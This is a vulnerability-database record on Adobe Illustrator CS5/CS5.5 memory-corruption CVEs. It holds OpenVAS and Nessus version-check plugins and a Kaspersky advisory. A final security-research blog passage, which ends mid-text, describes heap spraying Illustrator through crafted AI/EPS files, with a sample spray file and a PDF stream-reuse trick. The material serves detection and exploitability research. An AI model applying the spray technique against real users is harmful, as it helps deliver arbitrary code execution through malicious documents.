{"openvas": [{"lastseen": "2017-07-02T21:10:46", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Illustrator and is prone\n to multiple vulnerabilities.", "modified": "2017-04-25T00:00:00", "published": "2012-05-16T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=802788", "id": "OPENVAS:802788", "title": "Adobe Illustrator Multiple Unspecified Vulnerabilities (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_illustrator_mult_unspecified_vuln_macosx.nasl 6022 2017-04-25 12:51:04Z teissa $\n#\n# Adobe Illustrator Multiple Unspecified Vulnerabilities (Mac OS X)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_solution = \"Apply patch for Adobe Illustrator CS5 and CS5.5,\n For updates refer to http://www.adobe.com/support/security/bulletins/apsb12-10.html\n\n Or upgrade to Adobe Illustrator version CS6 or later,\n For updates refer to http://www.adobe.com/downloads/\";\n\ntag_impact = \"Successful exploitation will allow attackers to execute arbitrary code\n or cause denial of service.\n Impact Level: Application/System\";\ntag_affected = \"Adobe Illustrator version CS5.5 (15.1) on Mac OS X\";\ntag_insight = \"The flaws are due to an multiple unspecified errors in the\n application.\";\ntag_summary = \"This host is installed with Adobe Illustrator and is prone\n to multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(802788);\n script_version(\"$Revision: 6022 $\");\n script_cve_id(\"CVE-2012-2026\", \"CVE-2012-2025\", \"CVE-2012-2024\", \"CVE-2012-2023\",\n \"CVE-2012-0780\", \"CVE-2012-2042\");\n script_bugtraq_id(53422);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-25 14:51:04 +0200 (Tue, 25 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-16 17:55:09 +0530 (Wed, 16 May 2012)\");\n script_name(\"Adobe Illustrator Multiple Unspecified Vulnerabilities (Mac OS X)\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/47118\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id/1027047\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb12-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_illustrator_detect_macosx.nasl\");\n script_require_keys(\"Adobe/Illustrator/MacOSX/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\nilluVer = \"\";\n\nilluVer = get_kb_item(\"Adobe/Illustrator/MacOSX/Version\");\nif(!illuVer){\n exit(0);\n}\n\n## Check for Adobe Illustrator versions with patch\n## Adobe Illustrator CS5.5 (15.1.1) and CS5 (15.0.3)\nif(version_is_less(version:illuVer, test_version:\"15.0.3\"))\n{\n security_message(0);\n exit(0);\n}\n\nif(\"15.1\" >< illuVer)\n{\n if(version_is_less(version:illuVer, test_version:\"15.1.1\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:36", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Illustrator and is prone\n to multiple vulnerabilities.", "modified": "2017-04-11T00:00:00", "published": "2012-05-16T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=802790", "id": "OPENVAS:802790", "title": "Adobe Illustrator Multiple Unspecified Vulnerabilities (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_illustrator_mult_unspecified_vuln_win.nasl 5931 2017-04-11 09:02:04Z teissa $\n#\n# Adobe Illustrator Multiple Unspecified Vulnerabilities (Windows)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_solution = \"Apply patch for Adobe Illustrator CS5 and CS5.5,\n For updates refer to http://www.adobe.com/support/security/bulletins/apsb12-10.html\n\n Or upgrade to Adobe Illustrator version CS6 or later,\n For updates refer to http://www.adobe.com/downloads/\";\n\ntag_impact = \"Successful exploitation will allow attackers to execute arbitrary code\n or cause denial of service.\n Impact Level: Application/System\";\ntag_affected = \"Adobe Illustrator version CS5.5 (15.1) on Windows.\";\ntag_insight = \"The flaws are due to an multiple unspecified errors in the\n application.\";\ntag_summary = \"This host is installed with Adobe Illustrator and is prone\n to multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(802790);\n script_version(\"$Revision: 5931 $\");\n script_cve_id(\"CVE-2012-2026\", \"CVE-2012-2025\", \"CVE-2012-2024\", \"CVE-2012-2023\",\n \"CVE-2012-0780\", \"CVE-2012-2042\");\n script_bugtraq_id(53422);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-11 11:02:04 +0200 (Tue, 11 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-16 17:55:09 +0530 (Wed, 16 May 2012)\");\n script_name(\"Adobe Illustrator Multiple Unspecified Vulnerabilities (Windows)\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/47118\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id/1027047\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb12-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variable Initialization\nappkey = \"\";\nilluVer = \"\";\nappPath = \"\";\n\n## Confirm appln is installed\nappkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Illustrator.exe\";\nif(!registry_key_exists(key:appkey)) {\n exit(0);\n}\n\n## Get the installed path\nappPath = registry_get_sz(key:appkey, item:\"Path\");\nif(appPath)\n{\n illuVer = fetch_file_version(sysPath:appPath, file_name:\"Illustrator.exe\");\n if(!illuVer){\n exit(0);\n }\n\n ## Check for Adobe Illustrator versions with patch\n ## Adobe Illustrator CS5.5 (15.1.1) and CS5 (15.0.3)\n if(version_is_less(version:illuVer, test_version:\"15.0.3\"))\n {\n security_message(0);\n exit(0);\n }\n\n if(\"15.1\" >< illuVer)\n {\n if(version_is_less(version:illuVer, test_version:\"15.1.1\")){\n security_message(0);\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:42:28", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Illustrator and is prone\n to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2012-05-16T00:00:00", "id": "OPENVAS:1361412562310802788", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802788", "title": "Adobe Illustrator Multiple Unspecified Vulnerabilities (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_illustrator_mult_unspecified_vuln_macosx.nasl 11861 2018-10-12 09:29:59Z cfischer $\n#\n# Adobe Illustrator Multiple Unspecified Vulnerabilities (Mac OS X)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802788\");\n script_version(\"$Revision: 11861 $\");\n script_cve_id(\"CVE-2012-2026\", \"CVE-2012-2025\", \"CVE-2012-2024\", \"CVE-2012-2023\",\n \"CVE-2012-0780\", \"CVE-2012-2042\");\n script_bugtraq_id(53422);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 11:29:59 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-16 17:55:09 +0530 (Wed, 16 May 2012)\");\n script_name(\"Adobe Illustrator Multiple Unspecified Vulnerabilities (Mac OS X)\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/47118\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1027047\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb12-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_illustrator_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Illustrator/MacOSX/Version\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code\n or cause denial of service.\");\n script_tag(name:\"affected\", value:\"Adobe Illustrator version CS5.5 (15.1) on Mac OS X\");\n script_tag(name:\"insight\", value:\"The flaws are due to an multiple unspecified errors in the\n application.\");\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Illustrator and is prone\n to multiple vulnerabilities.\");\n script_tag(name:\"solution\", value:\"Apply patch for Adobe Illustrator CS5 and CS5.5, or upgrade to Adobe Illustrator version CS6 or later.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb12-10.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/downloads/\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nilluVer = get_kb_item(\"Adobe/Illustrator/MacOSX/Version\");\nif(!illuVer){\n exit(0);\n}\n\n## Adobe Illustrator CS5.5 (15.1.1) and CS5 (15.0.3)\nif(version_is_less(version:illuVer, test_version:\"15.0.3\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n\nif(\"15.1\" >< illuVer)\n{\n if(version_is_less(version:illuVer, test_version:\"15.1.1\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:43:49", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Illustrator and is prone\n to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2012-05-16T00:00:00", "id": "OPENVAS:1361412562310802790", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802790", "title": "Adobe Illustrator Multiple Unspecified Vulnerabilities (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_illustrator_mult_unspecified_vuln_win.nasl 11861 2018-10-12 09:29:59Z cfischer $\n#\n# Adobe Illustrator Multiple Unspecified Vulnerabilities (Windows)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802790\");\n script_version(\"$Revision: 11861 $\");\n script_cve_id(\"CVE-2012-2026\", \"CVE-2012-2025\", \"CVE-2012-2024\", \"CVE-2012-2023\",\n \"CVE-2012-0780\", \"CVE-2012-2042\");\n script_bugtraq_id(53422);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 11:29:59 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-16 17:55:09 +0530 (Wed, 16 May 2012)\");\n script_name(\"Adobe Illustrator Multiple Unspecified Vulnerabilities (Windows)\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/47118\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1027047\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb12-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code\n or cause denial of service.\");\n script_tag(name:\"affected\", value:\"Adobe Illustrator version CS5.5 (15.1) on Windows.\");\n script_tag(name:\"insight\", value:\"The flaws are due to an multiple unspecified errors in the\n application.\");\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Illustrator and is prone\n to multiple vulnerabilities.\");\n script_tag(name:\"solution\", value:\"Apply patch for Adobe Illustrator CS5 and CS5.5, or upgrade to Adobe Illustrator version CS6 or later.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb12-10.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/downloads/\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nappkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Illustrator.exe\";\nif(!registry_key_exists(key:appkey)) {\n exit(0);\n}\n\nappPath = registry_get_sz(key:appkey, item:\"Path\");\nif(appPath)\n{\n illuVer = fetch_file_version(sysPath:appPath, file_name:\"Illustrator.exe\");\n if(!illuVer){\n exit(0);\n }\n\n ## Adobe Illustrator CS5.5 (15.1.1) and CS5 (15.0.3)\n if(version_is_less(version:illuVer, test_version:\"15.0.3\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n if(\"15.1\" >< illuVer)\n {\n if(version_is_less(version:illuVer, test_version:\"15.1.1\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-01-16T20:13:50", "bulletinFamily": "scanner", "description": "The remote Windows host contains a version of Adobe Illustrator less\nthan CS5 15.0.3 / CS5.5 15.1.1. As such, it reportedly is affected by\nmultiple unspecified memory corruption vulnerabilities that could be \nexploited to execute arbitrary code.", "modified": "2018-11-15T00:00:00", "published": "2012-05-17T00:00:00", "id": "ADOBE_ILLUSTRATOR_APSB12-10.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=59179", "title": "Adobe Illustrator CS5 / CS5.5 Multiple Memory Corruption Vulnerabilities (APSB12-10)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(59179);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\n \"CVE-2012-0780\",\n \"CVE-2012-2023\",\n \"CVE-2012-2024\",\n \"CVE-2012-2025\",\n \"CVE-2012-2026\",\n \"CVE-2012-2042\"\n );\n script_bugtraq_id(53422);\n script_xref(name:\"EDB-ID\", value:\"19139\");\n\n script_name(english:\"Adobe Illustrator CS5 / CS5.5 Multiple Memory Corruption Vulnerabilities (APSB12-10)\");\n script_summary(english:\"Checks version of Adobe Illustrator\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Windows host contains an application affected by multiple\nmemory corruption vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Windows host contains a version of Adobe Illustrator less\nthan CS5 15.0.3 / CS5.5 15.1.1. As such, it reportedly is affected by\nmultiple unspecified memory corruption vulnerabilities that could be \nexploited to execute arbitrary code.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/bulletins/apsb12-10.html\");\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Either upgrade to Adobe Illustrator CS6 (16.0) or apply the update\nfor CS5 (15.0.3) or CS5.5 (15.1.1).\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:illustrator\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"adobe_illustrator_installed.nasl\");\n script_require_keys(\"SMB/Adobe Illustrator/Installed\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\nappname = \"Adobe Illustrator\";\nversion = get_kb_item_or_exit(\"SMB/Adobe Illustrator/version\");\npath = get_kb_item_or_exit(\"SMB/Adobe Illustrator/path\");\nprod = get_kb_item_or_exit(\"SMB/Adobe Illustrator/product\");\n\nver = split(version, sep:'.', keep:FALSE);\n\nif (\n ver[0] < 15 ||\n (\n ver[0] == 15 &&\n (\n (ver[1] == 0 && ver[2] < 3) ||\n (ver[1] == 1 && ver[2] < 1)\n )\n )\n) \n{\n if (ver[0] == 15 && ver[1] == 0) fix = \"CS5 (15.0.3) / CS6 (16.0)\";\n else if (ver[0] == 15 && ver[1] == 1) fix = \"CS5.5 (15.1.1) / CS6 (16.0)\";\n else fix = \"CS6 (16.0)\";\n\n port = get_kb_item(\"SMB/transport\");\n if (report_verbosity > 0)\n {\n report = \n '\\n Product : ' + prod + \n '\\n Path : ' + path + \n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port:port, extra:report);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, appname, version);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kaspersky": [{"lastseen": "2019-02-15T12:35:12", "bulletinFamily": "info", "description": "### *Detect date*:\n08/05/2012\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Adobe Illustrator. Malicious users can exploit these vulnerabilities to execute arbitrary code or cause denial of service at a point related to unspecified vectors.\n\n### *Affected products*:\nAdobe Illustrator versions 15.1 and earlier for Windows and Mac OS\n\n### *Solution*:\nUpdate to latest version \n[Illustrator](<https://www.adobe.com/products/illustrator.html>)\n\n### *Original advisories*:\n[Adobe bulletin](<http://www.adobe.com/support/security/bulletins/apsb12-10.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Illustrator](<https://threats.kaspersky.com/en/product/Adobe-Illustrator/>)\n\n### *CVE-IDS*:\n[CVE-2012-2042](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2042>) \n[CVE-2012-2023](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2023>) \n[CVE-2012-2024](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2024>) \n[CVE-2012-2025](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2025>) \n[CVE-2012-2026](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2026>) \n[CVE-2012-0780](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0780>)", "modified": "2019-02-13T00:00:00", "published": "2012-08-05T00:00:00", "id": "KLA10038", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10038", "title": "\r KLA10038Multiple ACE vulnerabilities in Adobe Illustrator ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "binamuse": [{"lastseen": "2017-07-29T13:19:49", "bulletinFamily": "info", "description": "[](<http://1.bp.blogspot.com/-SoNEWm58EUo/T7zwhM9H5yI/AAAAAAAAADE/-TRTXTnQz_w/s1600/adobe_illustrator_cs5.png>)Due to the recent patched vulnerabilities in Adobe Illustrator (CVE-2012-2023, CVE-2012-2024, CVE-2012-2025, and CVE-2012-2026) it becomes interesting to analyze the exploitability facts of the .ai file format. Early versions of the AI file format are true EPS files with a restricted, compact syntax, with additional semantics represented by Illustrator-specific DSC comments that conform to DSC's Open Structuring Convention. Originally, the AI file format was an augmented subset of postscript/eps and until version 7 its internals are described [here](<http://partners.adobe.com/public/developer/en/illustrator/sdk/AI7FileFormat.pdf>). This EPS based file format can still be opened with modern Adobe software but nowadays it is embedded into a PDF shell file. As Postscript is itself a programming language with conditionals, loops and everything else, it may be interesting to research what can be done with it in the different programs that accept this format. For ps detail see [this](<http://www.tcm.phy.cam.ac.uk/~mjr/eps.pdf>), [this](<http://www.adobe.com/products/postscript/pdfs/PLRM.pdf>) or [this](<http://partners.adobe.com/public/developer/en/ps/5002.EPSF_Spec.pdf>). \n \n \n\n\n### Postscript Heap Spray\n\nIllustrator operator 'XI' is used to embed and paste a 'raster' image in an illustration. From the Adobe Illustrator File Format Specification: \n\n\n> [ a b c d tx ty ] llx lly urx ury h w bits ImageType AlphaChannelCount reserved bin-ascii ImageMask XI \nArguments to the XI operator specify the location and size of the image, its pixel bit depth, color type, and other attributes\n\nPlaying with the width and height of the image we can easily make Illustrator allocate 1M of controlled data. For example an image of 128x8190 pixels will consume 1 Megabyte of memory. Note that both the width and the height shall be less than 32k pixels or it will hit an implementation limit. Dimensions like 1x1048576 seem to be out of the question. Here there is an example of a file which will allocates ~1M of \"A\"s, IllustratorHS1M.ai: \n \nThe metadata needed for representing this image in memory consumes near 0x100 bytes extra. We need to ask for a little less of pixel data (128x8190 = 1048320 bytes) in order to get the desired rounded megabyte. A screenshot of a debugging session of Illustrator after opening a file like this follows. \n\n\n[](<http://1.bp.blogspot.com/-QT6-0uZ0Xoc/T7LSpEx1yTI/AAAAAAAAABw/DPOuZUFAugY/s1600/IllustratorHS-1M.png>)\n\n \nNote that at the beginning (and also at the end) of the VirtualAlloced memory there is a bit of memory (0x80bytes) of uncontrolled metadata, this won't affect much a normal heap spraying scenario. A ready to try python script that generates such a file is [here](<https://sites.google.com/a/binamuse.com/home/IllustratorEPSHS.py>), and the example AI/EPS file is [here](<https://sites.google.com/a/binamuse.com/home/IllustratorEPSHS.ai>). \n \n%!PS-Adobe-3.0 %%Creator: Adobe Illustrator(TM) 3.2 %%AI8_CreatorVersion: 15.0.2 %AI5_FileFormat 11.0 %%For: (Administrator) () %%Title: (thafile.ai) %%CreationDate: 1/21/2011 12:32 PM %%BoundingBox: 0 0 640 480 %%EndComments %%BeginProlog %%EndProlog %%BeginSetup %%EndSetup u [128 0 0 8190 0 0] 0 0 128 8190 128 8190 8 1 0 0 1 0 %%BeginData: 1048320 XI XXXXXXXXXXXXXXXXXX ... XXXXXXXXXXXXXXXXXX %%EndData XH F U %%PageTrailer gsave annotatepage grestore showpage %%Trailer %%EOF \nThe simplest way to spray the Illustrator memory is to repeatedly include one of this images. It could be interesting to analyze the factibility of using a postscript 'for' or 'repeat' statement for this task, though we haven't went that way, instead we use the PDF way. \n\n\n### \n\n### Structure of the Illustrator PDF shell\n\nHere we discus the modern PDF encapsulated Ai format and focus on the PDF part. In the current version of the format, the Illustrator pseudo postscript is embedded in a PDF shell, specifically in PDF Streams. At first glance a .ai file pass for a normal PDF. Even the _file_ unix program recognize it as a PDF: \n\n\n> $ file illustration.ai \nillustration.ai: PDF document, version 1.5\n\nThe PDF **/PieceInfo** key in a **/Page** dictionary points to the Illustrator private data. If present Illustrator uses this private data to render the illustration and try to parse the normal PDF page contents otherwise._ _ \n\n\n> _PDF Reader opens the page content and ignore the Illustrator/private bit. An exploit for illustrator doesn't affect the Reader, and in fact exploits for one and the other can co-exist in the same PDF/AI file._\n\nThe minimal structure an Ai PDF must comply to be interpreted by Illustrator as a vector graphic is simple. The actual postscript must be divided in chunks and linked from a normal PDF page like this... \n[](<http://3.bp.blogspot.com/-YIhvjXJQx2A/T7T8m7YEEVI/AAAAAAAAAB8/9PeQ_8OzbPw/s1600/AIPDFStruct.png>) \n \n**C1**...**C100** are PDF streams holding chunks of the postscript illustration. As the data is contained in PDF Streams, all the compression facilities available in the PDF format become available for free. For example and most notably: deflate compression. \n \n \n \n \n Each private Ai chunk must be 64k bytes or less, and it shall be linked with sequential keys from the AIPrivate dictionary like this: \n \n/AIPrivateData1 PDFEREF1 \n/AIPrivateData2 PDFEREF2 \n/AIPrivateData3 PDFEREF3 \n/AIPrivateData4 PDFEREF4 \n... \n/AIPrivateDataN PDFEREF100 | [](<http://4.bp.blogspot.com/-bNEQ2bXGqTs/T7ZW_-GidgI/AAAAAAAAACI/Et5_suWvfNY/s1600/AIPrivateNotCollapsed.png>) \n---|--- \n \n\n\n### The trick\n\n_Several /AIPrivateData references can point to the same PDFStreams_. This way repetitions in the postscript data can be arranged so they are repeated using several references to the same stream. This saves saving a **lot** of space. PDFREFX here are PDF referesnces to indirect objects/streams like \"R 0 10\" and we can simply make it point to the same object. \n \n/AIPrivateData1 PDFEREF1 \n/AIPrivateData2 PDFEREF2 \n/AIPrivateData3 PDFEREF2 \n/AIPrivateData4 PDFEREF2 \n... \n/AIPrivateDataN PDFEREF100 | [](<http://4.bp.blogspot.com/-25_X2CebjSU/T7ZXY8osztI/AAAAAAAAACQ/kOFiABXJ1ZU/s1600/AIPrivateCollapsed.png>) \n---|--- \nIn order to obtain a nice spraying .ai file we first compile a near 300M AI private postscript file with 300 images of 1Megabyte each inside. This will fill the memory as expected but it has the drawback of being huge. To compress it to a manageable size it is divided in 64k chunks, deflated and put into PDF streams 